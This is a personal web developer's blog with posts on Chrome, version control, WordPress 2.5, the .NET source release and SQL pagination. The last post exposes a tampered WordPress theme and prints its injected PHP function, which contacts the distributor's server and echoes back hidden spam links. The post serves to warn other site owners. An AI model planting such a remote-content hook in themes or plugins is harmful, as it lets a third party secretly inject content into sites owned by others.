Apple sucks
24
Jun
18
Oct
I have not been blogging for quite some time now .. blame a hectic work schedule .. cooking and too much partying !
Another reason for me to stop blogging is that IM really tooo lazzzy to login to my blog and write a new post and publish it ..
I prefer twitter these days ..
the past few months have been really exciting for me ..
a lot of travel .. working with new technologies .. ROR , PHP .. worked on a Facebook App and an iPhone app ..
Right now IM using jquery working on a site using OOJS .. and also working on performance tuning for a couple of sites ..
3
Sep
I m indeed surprised at this move by google to launch a browser product ..
Google Chrome was released a few hours back for download ..
Google did it first with gtalk, reinvented IM. some people felt it lacked a lot of stuff . but for me gtalk is my primary IM now .. its just simple and clutter free..
Now Google is doing the same thing with Chrome. The main idea behind the product is to simplify Web Browsing and they have done a great job .. the initial version of the product looks impressive ..
I m a Web Developer and I was impressed when I saw that development tools came bundled . Also there’s a fancy task manager which I have not seen in any browser so far.
16
May
Version Control was not a big thing as long as I was doing freelance development. But once I got into the process of working with a team I released that a Team programming without source control is useless.
I started using CVS with the WinCVS client .. Then moved on to use Sub Version with the TortoiseSVN client..
I spent most of the last 2 years in Microsoft world .. So Team Foundation Server was the system..
Right now IM on Ruby and we are using Perforce which is actually Damn Good !
Ther user interface is damn simple although it might look a bit funny.
Its one the systems used by development teams which work on various platforms ..
I can check in code from my windows box and get latest on my Linux box / server ..
This is really cool !!
23
Mar
This event happened on March 23rd at Amethyst Cafe, Off Peters Road
Kiruba named it Tweetup a
I don’t use twitter that much but still Twitter has such a large user base .
It was fun meeting folks using the application
Gosh ! I finally managed to get the pics on Flickr ! check my twitter meet photo set Photos were captured by my Nokia N82 .. and damn IM not even there in a single pic !
19
Mar
Matt at ma.tt at Automattic are doing a great job with Wordpress
Wordpress 2.5 release candidate is out ..
IM a huge wordpress fan and user and any development in this area brings me a lot of joy
The latest release looks impressive..
A customizable dashboard, multi-file upload, built-in galleries, one-click plugin upgrades, tag management, built-in Gravatars, full text feeds, and faster load times sound interesting? Then WordPress 2.5 might be the release for you. It’s been in the oven for a while, and we’re finally ready to open the doors a bit to give you a taste.
Wow .. WP users cant ask for more .. Are you trying the RC1 ?
4
Oct
Some hot news for Microsoft Fans and Developers using the .Net platform. Microsoft is open sourcing .NET framework libraries.
We’ll begin by offering the source code (with source file comments included) for the .NET Base Class Libraries (System, System.IO, System.Collections, System.Configuration, System.Threading, System.Net, System.Security, System.Runtime, System.Text, etc), ASP.NET (System.Web), Windows Forms (System.Windows.Forms), ADO.NET (System.Data), XML (System.Xml), and WPF (System.Windows). We’ll then be adding more libraries in the months ahead (including WCF, Workflow, and LINQ). The source code will be released under the Microsoft Reference License (MS-RL).
You’ll be able to download the .NET Framework source libraries via a standalone install (allowing you to use any text editor to browse it locally). We will also provide integrated debugging support of it within VS 2008.
When you debug a .NET application and hit a breakpoint in your code, you’ll now be able to see a debugger call stack that contains detailed file and line number information for the .NET Framework classes and methods in your application:
Sounds interesting.? Are we nearing the day in which we understand completely what the Exceptions mean
25
Aug
9
Aug
Pagination is something we face eachtime when we build a web application. My project needed some kind of paging functionality last week and we were evaluating various options. I hate SQL Server for one reason and embrace MySQL for the ANSI defying LIMIT clause.
Pagination in MySQL is simply fun. Just say LIMIT starting record number,items per page and Voila you get the wanted result set.
Pagination in SQLServer is not that easy.You can however achieve paging using some work arounds like ROWORDER and ROWCOUNT in SQL Server
You need to be passing around the PrimaryKey and must sort the data based on the key for the pagination.You need to add a Numeric Primary Ke if your schema does not have one.
DataPager is a brilliant new Pagination Control available since .Net 3.5.
You can use it with the Repeater Control or the new ListView Control.
Its not like the DataGrid which uses tables for the markup. You can use it with Divs.
I was playing with Microsoft Visual Web Developer 2008 Beta 2 when i found this control.
30
Jul
I had downloaded a free theme after googling landed on templatesbrowser.com
The name might sound genuine. But beware they are a bunch of b@stards trying to place hidden links on all downloaded themes.
The theme available for download in the orginal site and at http://www.templatesbrowser.com/wordpress-themes/ have only one function in the code base different
function credits()
{
$URL = “http://get.templatesbrowser.com/wp.php?” . “URL=” . urlencode($_SERVER['REQUEST_URI']) . “&” . “host=” . urlencode($_SERVER['HTTP_HOST']);
$check = @fsockopen(”get.templatesbrowser.com”, 80, $errno, $errstr, 3);
if($check)
{
@readfile($URL);
fclose($check);
}
}
If you use one of those templates in your WordPress weblog, this piece of PHP code returns the following HTML code:
This produces a link at the bottom of every WordPress page, that is invisible for human readers, Which is an SEO backhat technique
By using such a wordpress theme you are going to be supporting spammers and sooner or later your site might loose its Search Engine presence even if its a high quality site.
So even if you lazy to build a wordpress theme from scratch , make sure to check the output markup so that you are not caught in a trap.
I had a narrow escape thanks to :- http://www.onnoot.com
